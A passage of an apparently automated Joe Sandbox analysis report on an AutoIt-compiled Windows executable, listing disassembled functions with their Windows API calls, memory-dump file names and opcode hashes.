                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                                                                                        • String ID: FILE
                                                                                                                                                        • API String ID: 4029003684-3121273764
                                                                                                                                                        • Opcode ID: 7f5e1b955a106be5da5f39e8d700f07721fff2bb08773927093908f075ed72ef
                                                                                                                                                        • Instruction ID: 27137a7d70cd1449fb87b4774a8c96f9a1d1035d73ce816425f2f33ee36156ad
                                                                                                                                                        • Opcode Fuzzy Hash: 7f5e1b955a106be5da5f39e8d700f07721fff2bb08773927093908f075ed72ef
                                                                                                                                                        • Instruction Fuzzy Hash: 8641C432A0421ABADF10DBA4CC81FEF7BBA9F49710F50046AF602E7291DB719A45C761
                                                                                                                                                        Function 00AFA578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00AFA668
                                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AFA67D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                        • String ID: '
                                                                                                                                                        • API String ID: 3850602802-1997036262
                                                                                                                                                        • Opcode ID: acd86716b0ef71e23909664eff2bc866bb47038d76a4da7319b5b886ac45225a
                                                                                                                                                        • Instruction ID: 495df1c1cf8f6bf678ac70507e2a9fb0cd9edceaecda027a911e450c53bb27d4
                                                                                                                                                        • Opcode Fuzzy Hash: acd86716b0ef71e23909664eff2bc866bb47038d76a4da7319b5b886ac45225a
                                                                                                                                                        • Instruction Fuzzy Hash: B841F8B5A003099FDB54CFA8C981BEA7BB5FF19300F14446AEA09EB341D770A945CFA1
                                                                                                                                                        Function 00AE57D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AE57E7
                                                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00AE581D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CrackInternet_memset
                                                                                                                                                        • String ID: |
                                                                                                                                                        • API String ID: 1413715105-2343686810
                                                                                                                                                        • Opcode ID: bd753fbd0e95d995325ab8b42245385e1fe470581dc3eee8f2591e8bce46c6e9
                                                                                                                                                        • Instruction ID: fbc702b0ffda2a71a75ca783e18ab294e1aa877368e170e7a018820ecc3d4e13
                                                                                                                                                        • Opcode Fuzzy Hash: bd753fbd0e95d995325ab8b42245385e1fe470581dc3eee8f2591e8bce46c6e9
                                                                                                                                                        • Instruction Fuzzy Hash: 9F314871D01109ABCF11AFA1DD95EEEBFB8FF19314F104029F816A6162EB319A06DB60
                                                                                                                                                        Function 00AF9567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00AF961B
                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00AF9657
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$DestroyMove
                                                                                                                                                        • String ID: static
                                                                                                                                                        • API String ID: 2139405536-2160076837
                                                                                                                                                        • Opcode ID: 633085cd880bdbb79f12ef4964fb6a439535df4345a4e5d7aa382930eb05edf1
                                                                                                                                                        • Instruction ID: 570ac72de3f7bf71e022996fd8183b39cfe2308126f9df0deaa0c37e07cb1a08
                                                                                                                                                        • Opcode Fuzzy Hash: 633085cd880bdbb79f12ef4964fb6a439535df4345a4e5d7aa382930eb05edf1
                                                                                                                                                        • Instruction Fuzzy Hash: F9318D31500208AEEB109FA8DC80BFB77A9FF59764F008619F9A9C7190CB31AC91DB60
                                                                                                                                                        Function 00AD5B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AD5BE4
                                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AD5C1F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                                                        • Opcode ID: 00ea808153b8abb89d0cdd9fe4cc8bfe26c19b6863459ee7c94889172f27a079
                                                                                                                                                        • Instruction ID: e500cc9608bf6a9d41d8f52278c11fa0ef69ea8730db8ee5f687bc5bae517240
                                                                                                                                                        • Opcode Fuzzy Hash: 00ea808153b8abb89d0cdd9fe4cc8bfe26c19b6863459ee7c94889172f27a079
                                                                                                                                                        • Instruction Fuzzy Hash: 5E31B931E10705ABDB25CFA8D985BEEBBF9EF05350F18001AE983972A1E7B09944CF10
                                                                                                                                                        Function 00AE6B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __snwprintf.LIBCMT ref: 00AE6BDD
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __snwprintf_memmove
                                                                                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                        • API String ID: 3506404897-2584243854
                                                                                                                                                        • Opcode ID: 9da453cd38bfb0af130998aacc0cdf61440b4936e79f2ce44c1ee65da89ba232
                                                                                                                                                        • Instruction ID: d20e084104fc70c92cc342ea94a7a15bb29ef873bdb636e5a64bc56fc8335be0
                                                                                                                                                        • Opcode Fuzzy Hash: 9da453cd38bfb0af130998aacc0cdf61440b4936e79f2ce44c1ee65da89ba232
                                                                                                                                                        • Instruction Fuzzy Hash: F9218C31600218AACF10EFA5C982FAE77F5EF94B40F140895F545AB291DB70EE42CBA1
                                                                                                                                                        Function 00AF91DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00AF9269
                                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AF9274
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                        • String ID: Combobox
                                                                                                                                                        • API String ID: 3850602802-2096851135
                                                                                                                                                        • Opcode ID: 2a8b4ac4929758db3234f62d507c0f0b635340875ef53cd44567ca4c13059e09
                                                                                                                                                        • Instruction ID: ef506780229b0692c6e0568aab6a36f902cea0241d241478275a92690ca5bcea
                                                                                                                                                        • Opcode Fuzzy Hash: 2a8b4ac4929758db3234f62d507c0f0b635340875ef53cd44567ca4c13059e09
                                                                                                                                                        • Instruction Fuzzy Hash: 7411607164020DBFEF25CF98DC81FFB37AAEB893A4F104125FA1897290D6719C518BA0
                                                                                                                                                        Function 00AF970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AAC657
                                                                                                                                                          • Part of subcall function 00AAC619: GetStockObject.GDI32(00000011), ref: 00AAC66B
                                                                                                                                                          • Part of subcall function 00AAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAC675
                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00AF9775
                                                                                                                                                        • GetSysColor.USER32(00000012), ref: 00AF978F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                        • String ID: static
                                                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                                                        • Opcode ID: a55a7001c7763e86d8fd4dbcfb1861d48e63e3b6f0d6b7fafcbe80a9373dc2b3
                                                                                                                                                        • Instruction ID: 25f0a4c5f316fd940285bbaa6a3382abea640dcb6237595f0a7e8f34de9ef7aa
                                                                                                                                                        • Opcode Fuzzy Hash: a55a7001c7763e86d8fd4dbcfb1861d48e63e3b6f0d6b7fafcbe80a9373dc2b3
                                                                                                                                                        • Instruction Fuzzy Hash: 2B113A72520209AFDB04DFB8CC45EFA7BB8EB08314F004929FA55E3150E735E851DB50
                                                                                                                                                        Function 00AF9424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00AF94A6
                                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00AF94B5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                                                                                        • String ID: edit
                                                                                                                                                        • API String ID: 2978978980-2167791130
                                                                                                                                                        • Opcode ID: 08f17c5123bb6cbe8d8b59b06a1410dcc0290c2e9a15be98b96b32b26b62c059
                                                                                                                                                        • Instruction ID: cea23f0193ff4d33b2c71507428af38a4fdab51f5e14c5f68eec6bd039b25385
                                                                                                                                                        • Opcode Fuzzy Hash: 08f17c5123bb6cbe8d8b59b06a1410dcc0290c2e9a15be98b96b32b26b62c059
                                                                                                                                                        • Instruction Fuzzy Hash: C3112B71500208AAEB108FA89C45FFB3B69EB25375F504724FA65971E0C7759C529B60
                                                                                                                                                        Function 00AD5C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AD5CF3
                                                                                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00AD5D12
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                                                        • Opcode ID: 5e54dc80075e44d182921c6a0b34ab7a06e8af18173e983a155677cfa9d94637
                                                                                                                                                        • Instruction ID: a854de6b16e929465288ee2b0354a1bc8cebc8f60d320ac164b5059d468f13a3
                                                                                                                                                        • Opcode Fuzzy Hash: 5e54dc80075e44d182921c6a0b34ab7a06e8af18173e983a155677cfa9d94637
                                                                                                                                                        • Instruction Fuzzy Hash: B5119072D11618ABDB60DB7CD848B9977FAAB06744F180063ED92EB390D770AD04CBA1
                                                                                                                                                        Function 00AE53F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00AE544C
                                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00AE5475
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                                                        • String ID: <local>
                                                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                                                        • Opcode ID: 461396099bbee1d1185f14ad2d24f492ee1885f876470444856b156f4f540ced
                                                                                                                                                        • Instruction ID: 4736e5b2ab9d52da0334c6dd159a47330d7fd521907f253b45a659574efea5cd
                                                                                                                                                        • Opcode Fuzzy Hash: 461396099bbee1d1185f14ad2d24f492ee1885f876470444856b156f4f540ced
                                                                                                                                                        • Instruction Fuzzy Hash: 2C11A370941A61BADB158F629C84EFBFBAAFF1275AF10812AF54597080E7705980C6F0
                                                                                                                                                        Function 00AEACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
